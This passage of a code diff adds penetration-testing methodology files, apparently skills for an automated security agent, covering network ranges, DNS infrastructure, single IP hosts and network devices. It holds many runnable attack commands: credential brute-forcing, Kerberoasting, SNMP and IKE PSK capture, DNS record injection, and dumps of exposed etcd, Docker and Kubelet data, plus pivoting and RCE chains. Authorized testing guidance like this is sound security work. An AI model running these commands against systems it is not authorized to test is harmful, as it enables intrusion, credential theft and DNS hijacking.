+# searchsploit for offline correlation
+searchsploit "OpenSSH 8.2" ; searchsploit apache 2.4.49
+```
+
+**Default / weak credentials** on admin panels, gear, and databases.
+```
+hydra -L users.txt -P /usr/share/seclists/Passwords/Common-Credentials/10-million-password-list-top-1000.txt \
+  ssh://<host> -t 4 -f                                     # throttle: -t 4, stop on first hit -f
+nuclei -l weburls.txt -tags default-login -silent          # default web logins
+# Network gear often ships admin/admin, cisco/cisco, root/calvin (iDRAC)
+```
+
+**Anonymous / unauthenticated data stores.**
+```
+redis-cli -h <host> -p 6379 INFO                           # open Redis: no AUTH required
+curl -s http://<host>:9200/_cat/indices                    # open Elasticsearch
+mongosh "mongodb://<host>:27017" --eval 'db.adminCommand("listDatabases")'
+smbclient //<host>/<share> -N -c 'ls'                       # readable null-session share
+```
+
+**SMB / RPC exposure** — null sessions, signing not required, EternalBlue-era patch levels.
+```
+nmap -n -Pn -p445 --script smb-protocols,smb-security-mode,smb2-security-mode,smb-vuln-ms17-010 <host>
+impacket-rpcdump <host>                                     # enumerate RPC endpoints
+impacket-GetUserSPNs <domain>/<user>:<pass> -dc-ip <host> -request   # Kerberoast if domain-joined
+```
+
+**SNMP information leak / write community.**
+```
+snmpwalk -v2c -c public <host> 1.3.6.1.2.1.1               # sysDescr, contact, location
+snmpwalk -v2c -c public <host> 1.3.6.1.2.1.25.4.2.1.2     # running processes (host MIB)
+# A writable community (often 'private') can alter device config — validate read-only first.
+```
+
+**TLS / certificate weaknesses** — expired, self-signed-on-prod, weak ciphers, internal names leaking topology.
+```
+sslscan <host>:443 ; nmap -n -Pn -p443 --script ssl-enum-ciphers <host>
+tlsx -u <host>:443 -san -cn -expired -self-signed -silent
+```
+
+**Exposed management / virtualization planes** — ESXi/vCenter, IPMI, Docker API, Kubernetes (see kubernetes skill).
+```
+curl -sk https://<host>:2376/version                       # Docker TLS API exposed
+nmap -n -Pn -p623 --script ipmi-version,ipmi-cipher-zero <host>   # IPMI cipher-0 auth bypass
+```
+
+## Validation
+
+1. Prove the host is live and the port is genuinely open/serving (`nmap -sV` banner + a real protocol handshake, not just a SYN-ACK).
+2. For a CVE, demonstrate the vulnerable version is present and, where safe, run a read-only/version-check exploit or a Nuclei template that returns a positive matcher — capture the matched response.
+3. For credentials, show a successful authenticated action (e.g. `ssh` banner + `id`, a readable share listing, a database `listDatabases`) — never modify or exfiltrate data; one harmless read is sufficient.
+4. For misconfiguration, capture the exact request/response that exposes the issue (open share `ls`, unauthenticated API JSON, SNMP sysDescr).
+5. Record `host:port`, product, version, and the reproduction command so the finding is independently repeatable.
+
+## False Positives
+
+- **Filtered ≠ open.** Firewalls and SYN-ACK from middleboxes/honeypots can fake open ports. Confirm with a real service handshake (`-sV`).
+- **Stale DHCP / decommissioned hosts** that answer one probe then vanish — re-test before reporting.
+- **Banner spoofing and WAF/CDN interception** — the version shown may be a proxy, not the origin. Cross-check with behavior, not just the banner string.
+- **Vulners/NSE version-based matches** flag CVEs by banner alone; backported patches (common on RHEL/Debian) leave the banner unchanged. Confirm actual exploitability.
+- **Decoy/honeypot hosts** advertising many open ports with implausible service combinations.
+- **Out-of-scope IPs** that resolve into the block via shared CDN/load-balancer addresses — verify ownership before acting.
+- **UDP "open|filtered"** is inherently ambiguous; treat as unconfirmed until a protocol response is observed.
+
+## Chaining & Impact
+
+- **Recon → unpatched service → RCE → foothold:** a single CVE on one host becomes a shell; from there re-scan adjacent subnets that were previously unreachable.
+- **Open share / SNMP / LDAP → credential harvest → credential reuse:** leaked configs, backups, or community strings yield credentials that often unlock SSH/RDP/SMB across many hosts in the block (password reuse is rampant on flat networks).
+- **Management plane access → mass compromise:** vCenter/IPMI/Docker/K8s control planes can power on, image, or exec into many workloads at once.
+- **Foothold → pivot → segmentation bypass:** use the compromised host as a jump point (`ssh -D`, chisel, ligolo-ng) to reach internal-only ranges, repeating the discovery loop one hop deeper.
+- **Database / file-share read → data exposure:** open Mongo/Elastic/Redis/NFS frequently hold PII, secrets, or tokens that further the chain into cloud and SaaS.
+
+## Pro Tips
+
+1. Sweep wide and cheap, enrich narrow and deep. Top-ports `naabu`/`masscan` across the whole block, then `nmap -sV -sC` only on what answered — this is faster and far quieter than running version detection on every IP.
+2. Always pass discovered ports back to `nmap` with `-p`; never let it re-scan its own default port list and miss your findings.
+3. Chunk large prefixes into /24s and run per-chunk with output files — runs stay restartable and a single slow host can't stall the whole job.
+4. Reverse DNS, TLS SAN/CN, and SMB/LDAP hostnames reveal the internal naming scheme; clusters of `db01`, `dc01`, `bak01` point straight at high-value targets.
+5. UDP is where the easy wins hide (SNMP, NTP monlist, mDNS, SSDP) precisely because most scans skip it — but keep it tightly scoped, it is slow.
+6. Throttle credential attempts hard (`-t 4 -f`) and watch for lockout policies; one locked admin account can end an engagement's goodwill.
+7. Re-run host discovery after every foothold — newly reachable internal subnets often appear once you are past the perimeter.
+8. Diff scans over time: a host that opens a new port or changes a banner mid-engagement may indicate a deploy, a defender response, or a honeypot.
+9. Keep `-Pn` in your back pocket: many production hosts drop ICMP but answer TCP — a "no live hosts" result on a populated block usually means discovery was too conservative.

--- a/strix/skills/network/dns_infrastructure.md
+++ b/strix/skills/network/dns_infrastructure.md
@@ -1,0 +1,170 @@
+---
+name: dns_infrastructure
+description: DNS infrastructure assessment - zone transfers, subdomain takeover, DNSSEC validation, resolver and cache behavior, and registrar/delegation abuse.
+---
+
+# DNS Infrastructure
+
+DNS infrastructure is the authoritative and recursive layer that maps names to addresses and publishes service metadata (MX, TXT, SRV, CAA, NS). The attacker's objective is to harvest internal topology, hijack dangling names, poison or manipulate resolution, and abuse misconfigured authoritative servers or resolvers to break confidentiality, integrity, or availability of everything that depends on a name. A single exposed zone transfer or a forgotten CNAME to a deprovisioned cloud bucket can expose the entire internal estate or yield full subdomain control.
+
+## Attack Surface
+
+**Authoritative servers**
+- TCP/UDP 53 on every NS listed in the zone's `NS` records and parent delegation
+- AXFR/IXFR (zone transfer) endpoints, often left open to the world or to stale secondary IPs
+- Dynamic updates (RFC 2136) on unprotected primaries; NOTIFY spoofing
+- Hidden primaries and out-of-rotation secondaries with weaker ACLs
+
+**Recursive resolvers**
+- Open resolvers (UDP/TCP 53) usable for cache poisoning and DDoS amplification
+- DoH/DoT endpoints (443/853) with their own ACL and validation behavior
+- Local stub/forwarder configs and split-horizon views that leak internal-only names
+
+**Delegation and registrar layer**
+- Dangling `CNAME`/`NS`/`A` records pointing to deprovisioned cloud resources (subdomain/NS takeover)
+- Lame delegations, expired domains, registrar account/email-verification weaknesses
+- CAA gaps that let an attacker issue certs after a takeover
+
+**Published metadata**
+- TXT (SPF/DKIM/DMARC, verification tokens, internal hostnames), SRV/MX (service map), HINFO/LOC leaks
+
+## Recon & Enumeration
+
+Most ProjectDiscovery and DNS tools are preinstalled in the Kali sandbox. Install any missing ones:
+```
+go install -v github.com/projectdiscovery/dnsx/cmd/dnsx@latest
+apt-get install -y dnsutils dnsrecon dnsenum fierce nsec3map  # dig/host/nslookup live in dnsutils
+go install -v github.com/haccer/subjack@latest   # subdomain-takeover signatures
+pip install dnstwist                              # registrable lookalikes / typosquats
+```
+
+Map authoritative servers and delegation:
+```
+dig +short NS example.com
+dig +short SOA example.com
+dig +trace example.com            # walk delegation parent->child, spot lame/inconsistent NS
+whois example.com | grep -iE 'expir|registrar|name server|status'
+```
+
+Attempt zone transfer against every NS (the highest-value quick win):
+```
+for ns in $(dig +short NS example.com); do
+  echo "== $ns =="; dig AXFR example.com @"$ns" +time=5 +tries=1
+done
+dnsrecon -d example.com -t axfr
+fierce --domain example.com        # NS discovery + AXFR + bruteforce
+```
+
+Enumerate records and brute hosts:
+```
+dnsrecon -d example.com -t std,srv,axfr
+dnsx -d example.com -w /usr/share/seclists/Discovery/DNS/dns-Jhaddix.txt -a -aaaa -cname -mx -ns -txt -resp -silent -o dnsx.txt
+subfinder -d example.com -all -recursive -silent -o subs.txt
+dnsx -l subs.txt -a -cname -resp -silent -o resolved.txt   # resolve + capture CNAME chains for takeover triage
+```
+
+DNSSEC posture and zone-walking:
+```
+dig +dnssec +multiline DNSKEY example.com
+dig +dnssec SOA example.com | grep -E 'RRSIG|ad;'   # 'ad' flag = validating resolver accepted signatures
+delv example.com A +rtrace                          # full chain-of-trust validation with reasons
+dig +short +dnssec NSEC3PARAM example.com
+nsec3map -o hashes.txt example.com                  # walk NSEC3 zones; nsec (no 3) walks trivially via NSEC chasing
+```
+
+Resolver behavior, takeover, and lookalikes:
+```
+nmap -sU -sV -p53 --script dns-recursion,dns-cache-snoop,dns-nsid,dns-zone-transfer <resolver_ip>
+nuclei -l resolved.txt -t dns/ -tags takeover -severity high,critical -j -o dns_nuclei.jsonl
+subjack -w subs.txt -t 50 -timeout 10 -ssl -c /root/go/.../subjack/fingerprints.json -v -o takeover.txt
+dnstwist --registered example.com   # phishing/typosquat domains already registered
+```
+
+## Methodology
+
+1. **Establish delegation truth.** `dig NS` at the child, `dig +trace` from root, and compare against the parent's glue. Note every NS IP, hidden primaries, lame delegations, and NS/glue mismatches — these define the real attack surface.
+2. **Hunt zone transfers.** Run AXFR against each NS (TCP 53). A successful transfer dumps the entire zone: internal hosts, naming conventions, infra IPs. Also try IXFR and stale secondary IPs from historical records.
+3. **Brute and passive-enumerate names.** Combine `subfinder` (passive) with `dnsx` wordlist resolution. Capture full CNAME chains and the final answer for every host.
+4. **Triage dangling records.** For each CNAME/NS/A, check whether the target resource still exists. A CNAME to an unclaimed cloud endpoint (S3, Azure, Heroku, GitHub Pages, Fastly, etc.) returning NXDOMAIN or a "no such bucket/app" page is a candidate takeover.
+5. **Assess DNSSEC.** Determine if the zone is signed, whether the chain validates (`delv`), whether DS exists at the parent, and whether weak algorithms (RSA/SHA-1, alg 5/7) or NSEC (vs NSEC3) enable zone-walking.
+6. **Probe resolvers.** Identify open recursion, cache-snooping, predictable source ports/TXIDs, and lack of 0x20/DNS-cookie defenses. Check DoH/DoT for the same.
+7. **Inspect published metadata.** Parse SPF/DKIM/DMARC for spoofing gaps, find verification TXT records and internal hostnames, map services via SRV/MX.
+8. **Validate registrar/CAA layer.** Check domain expiry, registrar-lock status, and whether CAA restricts issuance after a takeover.
+
+## Key Weaknesses / Techniques
+
+**Open zone transfer (AXFR).** The classic full-disclosure bug. Confirm by dumping the zone:
+```
+dig AXFR internal.example.com @ns1.example.com
+```
+A non-empty `IN SOA ... IN A ...` listing rather than `Transfer failed` means the entire zone leaked. Capture it for the internal map; do not modify records.
+
+**Subdomain takeover (dangling CNAME).** A name like `legacy.example.com` CNAMEs to `legacy-app.s3.amazonaws.com` that no longer exists. Verify the dangle, then assess claimability:
+```
+dig +short CNAME legacy.example.com
+curl -sSI https://legacy.example.com   # look for "NoSuchBucket", "There isn't a GitHub Pages site here", etc.
+```
+PoC = registering the orphaned resource (only with explicit authorization and on a scoped non-production name) and serving a harmless marker file, never live malicious content.
+
+**NS takeover / lame delegation.** A delegated subzone points to an NS whose domain or cloud DNS zone is unclaimed. Claiming it yields authority over the entire subzone — far broader than a single CNAME. Confirm with `dig NS sub.example.com` returning servers that NXDOMAIN or that you can register.
+
+**DNSSEC failures.** Unsigned zones permit on-path spoofing/cache poisoning. Broken chains (missing DS at parent, expired RRSIG, key rollover errors) cause SERVFAIL or, worse, silent bypass on non-validating resolvers. NSEC zones allow trivial zone-walking (`dig NSEC` chasing); weak algorithms (alg 5/7, SHA-1) weaken integrity.
+
+**Cache poisoning / resolver manipulation.** Open recursion plus predictable TXID or static source port enables Kaminsky-style poisoning; absent 0x20 encoding and DNS cookies (RFC 7873) lowers off-path difficulty. Confirm recursion and snoop the cache for visited domains:
+```
+nmap -sU -p53 --script dns-recursion,dns-cache-snoop --script-args 'dns-cache-snoop.mode=timed,dns-cache-snoop.domains={www.bank.com,vpn.example.com}' <resolver_ip>
+```
+
+**Amplification / DoS.** Open resolvers answering large records (ANY, DNSKEY, TXT) for spoofed sources are reflectors. Measure the amplification factor (response/query size) read-only; never source-spoof or send sustained traffic.
+
+**Dynamic update abuse.** RFC 2136 primaries without TSIG let an attacker inject/overwrite records:
+```
+nsupdate -v <<'EOF'
+server ns1.example.com
+zone example.com
+update add evil.example.com 60 A 203.0.113.10
+send
+EOF
+```
+A successful update (verify with a fresh `dig`) is integrity compromise of the zone.
+
+**SPF/DMARC gaps.** `+all`/`?all`, overly broad includes, or missing DMARC enable email spoofing of the domain — chains into phishing and password reset abuse.
+
+## Validation
+
+1. **Zone transfer:** show the AXFR output containing real RRs the NS should not expose externally; record which NS IP served it and that it is reachable from outside the trusted secondary set.
+2. **Takeover:** prove the target resource is unclaimed (NXDOMAIN/error fingerprint) AND that you (with authorization) claimed it and served a benign proof token at the orphaned name. A dangling record alone is suggestive, not confirmed.
+3. **DNSSEC:** use `delv +rtrace` / `dig +dnssec` to show the specific validation state (insecure/bogus/expired RRSIG/missing DS) with the actual chain output.
+4. **Open resolver/recursion:** query an external domain you control through the resolver and observe it recursing for a non-cached, third-party name; cache-snoop to demonstrate it answers for arbitrary domains.
+5. **Dynamic update:** add a uniquely-named harmless record, confirm it resolves, then remove it. Document exactly which NS accepted the update without TSIG.
+
+## False Positives
+
+- **AXFR refused but partial answer:** `Transfer failed.` or only the SOA returned is not a leak; require a full RR set.
+- **Takeover false alarms:** a CNAME to a *live* third-party that simply returns 404 is not claimable. Many cloud providers now block re-registration of released names; verify the resource is actually claimable, not merely 404ing.
+- **DNSSEC "bogus" from your own resolver:** local time skew or a stale trust anchor causes false SERVFAIL — validate from a clean resolver before reporting.
+- **Recursion that is ACL-scoped:** a resolver recursing for you because your test IP is in an allowlist is not "open." Test from an out-of-scope vantage where authorized.
+- **Internal names from split-horizon:** names visible only because you queried an internal view are not external disclosure.
+- **Wildcard records:** `*.example.com` resolving makes brute-force tools report thousands of "hosts" that do not exist — detect the wildcard first (`dig randomstring123.example.com`).
+
+## Chaining & Impact
+
+- AXFR / brute enum → internal hostnames and IP ranges → targeted attacks on admin panels, VPN, mail, and staging not meant to be public.
+- Subdomain takeover → serve content under a trusted name → cookie theft (parent-domain cookies), OAuth/SSO redirect abuse, CSP bypass, and phishing with a legitimate certificate (issue via the takeover unless CAA blocks it).
+- NS takeover → full control of a subzone → mint arbitrary records, intercept mail (MX), and pass ACME DNS-01 challenges to issue wildcard certs.
+- Cache poisoning / dynamic update → redirect users and services (login, update servers, package mirrors) → credential capture and supply-chain compromise.
+- SPF/DMARC gaps + lookalike domains → high-fidelity phishing → account takeover that feeds the rest of the chain.
+- Open resolver → reflection/amplification participation and cache snooping that fingerprints the victim's upstream dependencies.
+
+## Pro Tips
+
+1. Always query *every* NS individually; one stale secondary frequently still allows AXFR while the primaries refuse.
+2. Pull historical NS/A records (passive DNS, `whois -h whois.cymru.com`, crt.sh) — decommissioned servers and old delegations are where transfers and takeovers hide.
+3. crt.sh and certificate transparency reveal subdomains DNS brute-forcing misses; cross-reference CT names against live resolution to surface dangling records.
+4. Detect wildcard DNS before brute-forcing or every tool will drown you in phantom hosts.
+5. For takeovers, the error-page fingerprint matters more than NXDOMAIN — keep `subjack`/nuclei takeover templates current; provider strings change.
+6. NSEC zones are a free zone enumeration: chase the NSEC chain instead of brute-forcing. NSEC3 needs `nsec3map` plus a wordlist/GPU to reverse hashes.
+7. The `ad` flag in a `dig` answer tells you the *resolver* validated DNSSEC; absence of DS at the parent tells you the *zone* is effectively unsigned regardless of its DNSKEYs.
+8. Check CAA early — a strict CAA can be the only control stopping a confirmed takeover from escalating to a trusted certificate.
+9. Test DoH/DoT separately; ACLs and validation often differ from plain UDP 53 on the same infrastructure.
+10. Keep all destructive probes (dynamic update, amplification) read-only or self-cleaning, and confine claimed takeover resources to benign proof tokens.

--- a/strix/skills/network/ip_address.md
+++ b/strix/skills/network/ip_address.md
@@ -1,0 +1,162 @@
+---
+name: ip_address
+description: Methodology for assessing a single IP address asset — port/service discovery then per-service exploitation.
+---
+
+# IP Address (Network Host)
+
+An IP address asset is a single routable host: a bare network endpoint with no implied application context. The attacker's objective is to enumerate every reachable port, fingerprint the service behind each one, and then drive each service down its own exploitation path — unauthenticated RCE, default/weak credentials, exposed admin/management planes, info leaks, and protocol-specific abuse. Treat the IP as the root of a tree: the port/service scan is breadth, and every confirmed service spawns a focused depth assessment. Resolve the IP to its host context first (PTR, certificate SANs, vhosts) because the same socket often fronts many logical apps.
+
+## Attack Surface
+
+- **TCP/UDP service ports** — web (80/443/8080/8443), SSH (22), databases (3306/5432/1433/27017/6379/9200/11211), RPC/SMB (135/139/445), RDP (3389), mail (25/110/143/465/587/993), DNS (53), SNMP (161/udp), LDAP (389/636), VPN/IPsec (500/4500/udp), Docker/k8s (2375/2379/10250).
+- **Management & admin planes** — IPMI/iDRAC/iLO, vCenter, router/switch web UIs, Redis/Memcached with no auth, exposed `/metrics`, Kubelet, Consul/etcd, Jenkins, monitoring stacks.
+- **Virtual-host multiplexing** — one IP fronting many TLS SNI hosts or HTTP `Host` vhosts; the IP-default response often differs from the intended apps.
+- **Network identity leakage** — PTR records, TLS cert CN/SAN, service banners, SNMP sysDescr, SMB/NetBIOS names that map the host into an org and reveal sibling assets.
+- **UDP services** — frequently skipped, often unauthenticated (SNMP, DNS, NTP, IKE, mDNS, NetBIOS), and commonly amplification/info-leak vectors.
+
+## Recon & Enumeration
+
+Most tooling below ships in the Kali sandbox. Install lines are given for service-specific tools.
+
+**Pass 1 — broad TCP discovery (fast, then verify):**
+```
+naabu -host <ip> -top-ports 1000 -scan-type c -Pn -rate 300 -c 25 -timeout 1000 -retries 1 -verify -silent -j -o naabu.jsonl
+naabu -host <ip> -p - -scan-type c -Pn -rate 500 -c 25 -timeout 1000 -retries 1 -verify -silent   # full sweep when scope allows
+```
+
+**Pass 2 — service/version + default scripts on the discovered ports only:**
+```
+nmap -n -Pn -sV -sC -p <comma_ports> --version-intensity 5 --script-timeout 30s --host-timeout 5m -oA nmap_services <ip>
+```
+
+**UDP top ports (slow — keep tight):**
+```
+sudo nmap -n -Pn -sU --top-ports 50 --open -T4 --max-retries 1 --host-timeout 5m -oA nmap_udp <ip>
+```
+
+**Host identity & DNS context:**
+```
+dnsx -ptr -l <(echo <ip>) -resp -silent          # reverse DNS
+nmap -n -Pn -p 443,8443 --script ssl-cert <ip>   # cert CN/SAN reveals vhosts/org
+openssl s_client -connect <ip>:443 -showcerts </dev/null 2>/dev/null | openssl x509 -noout -text | grep -A1 'Subject Alternative'
+```
+
+**Web-port triage (run after ports are known):**
+```
+httpx -l <(printf '%s\n' <ip>:80 <ip>:443 <ip>:8080 <ip>:8443) -sc -title -tech-detect -server -tls-grab -favicon -json -o httpx.json
+wafw00f https://<ip>
+```
+
+**Vuln sweep across all live services:**
+```
+nuclei -u <ip> -as -s critical,high -rl 50 -c 20 -bs 20 -timeout 10 -retries 1 -silent -j -o nuclei.jsonl
+nuclei -u <ip> -tags network,default-login,exposure,misconfig -s critical,high,medium -silent -j -o nuclei_net.jsonl
+```
+
+**Service-specific installs:**
+- TLS: `testssl.sh https://<ip>:443` (`apt install testssl.sh`).
+- SMB/RPC: `apt install smbclient enum4linux-ng` then `enum4linux-ng -A <ip>`; `nmap --script smb-vuln-* -p445 <ip>`.
+- SNMP: `apt install snmp onesixtyone` then `onesixtyone -c community.txt <ip>` and `snmpwalk -v2c -c public <ip>`.
+- LDAP/AD: `apt install ldap-utils python3-impacket` then `ldapsearch -x -H ldap://<ip> -s base namingcontexts`.
+- SSH posture: `pip install ssh-audit` then `ssh-audit <ip>`.
+- DBs: `redis-cli -h <ip> ping`, `mongosh "mongodb://<ip>:27017"`, `psql -h <ip> -U postgres`.
+
+## Methodology
+
+1. **Establish scope & identity** — confirm the IP is in scope, capture PTR, ASN/owner, and TLS SAN so you know which org and which sibling hosts the asset belongs to.
+2. **Discover ports (breadth)** — `naabu` top-1000 with `-verify`, then a full `-p -` sweep if scope permits. Never enrich ports you have not verified open.
+3. **Fingerprint services (depth entry)** — `nmap -sV -sC` against only the open ports to get exact product/version, then add UDP top-50 separately.
+4. **Branch per service** — for each open port, switch into its specific assessment (web → katana/ffuf/nuclei; SMB → enum4linux-ng; DB → auth probe; etc.). The IP scan exists to produce these branches.
+5. **Version-to-CVE mapping** — feed exact versions to `nuclei -as` and targeted CVE templates; cross-check `nmap --script vuln`.
+6. **Auth & defaults** — test default/weak credentials on every authenticated service (SSH, RDP, DBs, admin panels, SNMP communities) using small, scoped wordlists.
+7. **Web vhost resolution** — if 80/443 serve a generic/default page, brute `Host`/SNI to surface the real applications behind the IP.
+8. **Validate & PoC** — confirm each candidate with a minimal, non-destructive proof and capture reproducible evidence.
+9. **Chain** — pivot a single foothold (creds, file read, SSRF-able service) into deeper access across the host and into the network.
+
+## Key Weaknesses / Techniques
+
+**Unauthenticated/exposed data stores** — Redis, Memcached, Elasticsearch, MongoDB, etcd bound to the public IP with no auth.
+```
+redis-cli -h <ip> info server            # version + CONFIG GET dir/dbfilename → RDB write primitive
+curl -s http://<ip>:9200/_cat/indices    # Elasticsearch index/data exposure
+curl -s http://<ip>:2379/v2/keys/?recursive=true   # etcd keys (often k8s secrets)
+```
+
+**Default / weak credentials** on management services — test conservatively against SSH, RDP, web admin, DBs, SNMP.
+```
+hydra -L users.txt -P pass-small.txt -t 4 -f ssh://<ip>
+nmap -p 161 --script snmp-brute --script-args snmp-brute.communitiesdb=community.txt <ip>
+```
+
+**Service-version CVEs** — map the exact banner to known unauthenticated RCEs (e.g. exposed Jenkins, GitLab, Confluence, Exchange, vCenter, RDP/SMB). Drive with version-pinned templates.
+```
+nuclei -u https://<ip>:8443 -t http/cves/ -s critical,high -silent -j -o cve.jsonl
+nmap -p445 --script smb-vuln-ms17-010,smb-vuln-cve-2020-0796 <ip>
+```
+
+**TLS/transport flaws** — expired/self-signed certs, weak ciphers, Heartbleed, certs leaking internal hostnames and additional vhosts.
+```
+testssl.sh --severity HIGH https://<ip>:443
+```
+
+**SMB/RPC exposure** — null sessions, anonymous share read, signing disabled, OS/user enumeration.
+```
+enum4linux-ng -A <ip>
+smbclient -N -L //<ip>/
+```
+
+**SNMP info leak** — `public`/`private` communities exposing routes, processes, ARP, and sometimes write access for config theft.
+```
+snmpwalk -v2c -c public <ip> 1.3.6.1.2.1.25.4.2.1.2   # running processes
+```
+
+**Docker/Kubelet plane** — unauthenticated Docker API or Kubelet read = container/host takeover.
+```
+curl -s http://<ip>:2375/version && curl -s http://<ip>:2375/containers/json
+curl -sk https://<ip>:10250/pods                       # Kubelet pod listing
+```
+
+**Web behind the IP** — once a web port is confirmed, treat it as a web target: crawl, content-discover, and look for the usual classes (SQLi, SSRF, path traversal, auth bypass).
+```
+katana -u https://<ip> -jc -kf all -silent -o urls.txt
+ffuf -u https://<ip>/FUZZ -w /usr/share/seclists/Discovery/Web-Content/raft-medium-directories.txt -mc 200,204,301,302,401,403 -t 40
+```
+
+## Validation
+
+1. **Open port** — re-confirm with `nmap -sV` against the single port; a verified banner beats a raw SYN-ACK from a stateful firewall.
+2. **Exposure** — capture the actual leaked data (index list, key dump, share listing) with a single read-only request; show the public IP in the request and the sensitive content in the response.
+3. **Default creds** — log in once, run one harmless identifying command (`id`, `whoami`, `SELECT version()`, `INFO`), capture output, and stop.
+4. **CVE** — prefer a safe detection signature (version match + a benign template hit) over destructive exploitation; if exploitation is required and authorized, demonstrate minimal impact (e.g., read a non-sensitive file) and record exact request/response.
+5. **TLS** — attach the `testssl.sh` line proving the weak cipher/cert and, for Heartbleed, the leaked memory snippet with PII redacted.
+6. Record the exact port, protocol, product/version, command, and timestamp so the finding is reproducible.
+
+## False Positives
+
+- **Firewall/IPS SYN-ACK on every port** — a host that reports hundreds of "open" ports with no banners is likely a filtering device, not real services; `-verify`/`nmap -sV` will show no service.
+- **Shared hosting / CDN / load balancer IP** — the IP fronts many tenants; the default response is not the in-scope app, and a finding on the edge may not belong to the target.
+- **Honeypot signatures** — implausible combinations (every DB + RDP + SMB open with stub banners) indicate a decoy.
+- **Self-signed cert "errors"** — internal/mgmt hosts legitimately use self-signed certs; only escalate if it enables interception or exposes data.
+- **`nuclei` info/low template noise** — version banners and tech-detect hits are leads, not vulnerabilities, until tied to an exploitable condition.
+- **Rate-limit/scan artifacts** — ports that flap open/closed under load; re-verify slowly before reporting.
+
+## Chaining & Impact
+
+- Default DB/Redis creds → write primitive (Redis RDB to crontab/SSH key, MSSQL `xp_cmdshell`) → host RCE.
+- SNMP `private` write or exposed config → credential/key theft → lateral movement to sibling hosts revealed by ARP/route tables.
+- TLS SAN / PTR enumeration → discovery of additional in-scope hosts and internal hostnames → wider footprint.
+- Web SSRF on the IP → cloud metadata (`169.254.169.254`) → IAM credentials → cloud control plane (see the SSRF skill).
+- Unauth Docker/Kubelet → container escape / host takeover → pivot into the orchestrator and its secrets.
+- Single foothold (SSH/RDP via weak creds) → internal port scan from the host → reach previously unroutable RFC1918 services.
+
+## Pro Tips
+
+- Always run a **full `-p -` sweep when scope allows** — the highest-impact findings (mgmt planes, forgotten DBs, debug ports) live on non-standard ports above 1024.
+- UDP is where the easy unauthenticated leaks hide (SNMP, DNS, IKE, NetBIOS); budget time for at least the top-50.
+- The **TLS certificate is free recon** — SAN entries reveal sibling hostnames and the org, turning one IP into a host inventory.
+- If 80/443 returns a bland default page, the real apps are vhosts — brute `Host:`/SNI before concluding "nothing here".
+- Pin exploitation to the **exact version string**; a generic CVE template firing on a patched build is the most common false report.
+- Keep credential testing tiny and targeted (4 threads, curated small lists) to avoid lockouts and to stay defensible.
+- Scan from a stable egress and re-verify flapping ports slowly; transient results waste triage time and erode report credibility.
+- Treat the IP scan as a **dispatcher**: its only job is to hand each open port to the right specialist methodology — don't try to exploit everything from the network layer.

--- a/strix/skills/network/network_device.md
+++ b/strix/skills/network/network_device.md
@@ -1,0 +1,140 @@
+---
+name: network_device
+description: Authorized assessment of switches, routers, and firewalls — fingerprint the device, test management exposure, and validate known CVEs and misconfigurations.
+---
+
+# Network Device
+
+A network device is a switch, router, firewall, VPN concentrator, load balancer, or wireless controller (Cisco IOS/IOS-XE/ASA/FTD, Juniper Junos, Fortinet FortiOS, Palo Alto PAN-OS, MikroTik RouterOS, pfSense/OPNsense, F5 BIG-IP, Citrix ADC/NetScaler, Aruba, HPE/Comware, Ubiquiti). The attacker's objective is to reach a management plane that should never be Internet-facing — telnet/SSH/HTTPS admin UIs, SNMP, REST/NETCONF APIs, vendor-specific autoconfig services — then turn a default credential, exposed config, or unpatched edge-device CVE into device administrative control, config exfiltration (which contains downstream credentials), traffic interception, or a pivot deeper into the network. Edge VPN/firewall appliances are the single most actively exploited asset class on the perimeter; treat any management interface reachable from your scan position as a critical finding by default.
+
+## Attack Surface
+
+- **Management protocols**: SSH (22), Telnet (23), HTTP/HTTPS admin (80/443/4443/8443/10443), SNMP (161/udp), NETCONF (830), RESTCONF, vendor APIs.
+- **Routing/discovery protocols**: BGP (179), OSPF, EIGRP, RIP, VRRP/HSRP, CDP/LLDP, STP — often unauthenticated on the LAN/peering side.
+- **VPN/remote-access**: IKE/IPsec (500/4500 udp), SSL-VPN portals (PAN GlobalProtect, Fortinet, Citrix Gateway, Cisco AnyConnect/WebVPN).
+- **Aux/legacy**: TFTP (69/udp) config push/pull, FTP, finger, Smart Install (4786/Cisco), bootp/DHCP, NTP, syslog, GRE/IPsec tunnel endpoints.
+- **Out-of-band**: IPMI/BMC, serial console servers, vendor cloud-management agents (Meraki, FortiManager, Panorama).
+- **Credential reuse**: configs embed SNMP communities, RADIUS/TACACS+ secrets, IPsec PSKs, local user hashes (type 7 reversible, type 5/8/9), and downstream service passwords.
+
+## Recon & Enumeration
+
+```bash
+# Fast port discovery, then targeted service/version fingerprint
+naabu -host 203.0.113.10 -top-ports 1000 -p 22,23,69,80,161,179,443,500,830,2000,4443,4786,8080,8443,10443 -o ports.txt
+nmap -sS -sV -O -p 22,23,80,161,443,830,4443,8443,10443 -sU -p161,500,4500,69 203.0.113.10 -oA nd_scan
+
+# SNMP — communities are the fastest win; default/guessable strings expose full config
+onesixtyone -c /usr/share/seclists/Discovery/SNMP/common-snmp-community-strings.txt 203.0.113.10
+snmpwalk -v2c -c public 203.0.113.10 1.3.6.1.2.1.1     # sysDescr/sysName -> exact model + firmware
+snmpwalk -v2c -c public 203.0.113.10 1.3.6.1.2.1.25    # hrSWRun, installed sw
+nmap -sU -p161 --script snmp-info,snmp-sysdescr,snmp-interfaces 203.0.113.10
+# Cisco config exfil via SNMP-write (rw community) -> TFTP
+snmp-check 203.0.113.10 -c private
+
+# Web/management plane fingerprint
+httpx -u https://203.0.113.10:8443 -title -tech-detect -status-code -tls-grab -favicon -web-server
+wafw00f https://203.0.113.10:10443
+
+# IKE/IPsec aggressive-mode + vendor fingerprint (PSK hash capture)
+ike-scan -M 203.0.113.10
+ike-scan -A -M -P psk.txt 203.0.113.10           # aggressive mode -> offline PSK crack
+
+# SSH/Telnet banner + host key (firmware era, weak kex)
+nmap -p22 --script ssh2-enum-algos,ssh-hostkey 203.0.113.10
+
+# Cisco Smart Install (unauth config pull/RCE on legacy IOS)
+nmap -p4786 --script cisco-siet 203.0.113.10      # or: pip3 install siet ; SIET.py -i 203.0.113.10 -g
+
+# Known-CVE sweep — edge appliances have the densest CVE coverage in nuclei
+nuclei -u https://203.0.113.10:10443 -tags cisco,fortinet,paloalto,citrix,mikrotik,juniper,f5,network -s critical,high -silent -j -o nd_nuclei.jsonl
+nuclei -l mgmt_urls.txt -as -s critical,high -rl 30 -c 10 -bs 10 -timeout 10 -retries 1 -j -o nd_as.jsonl
+
+# Admin-UI path/endpoint discovery once fingerprinted
+ffuf -u https://203.0.113.10:10443/FUZZ -w /usr/share/seclists/Discovery/Web-Content/common.txt -mc 200,301,302,401,403
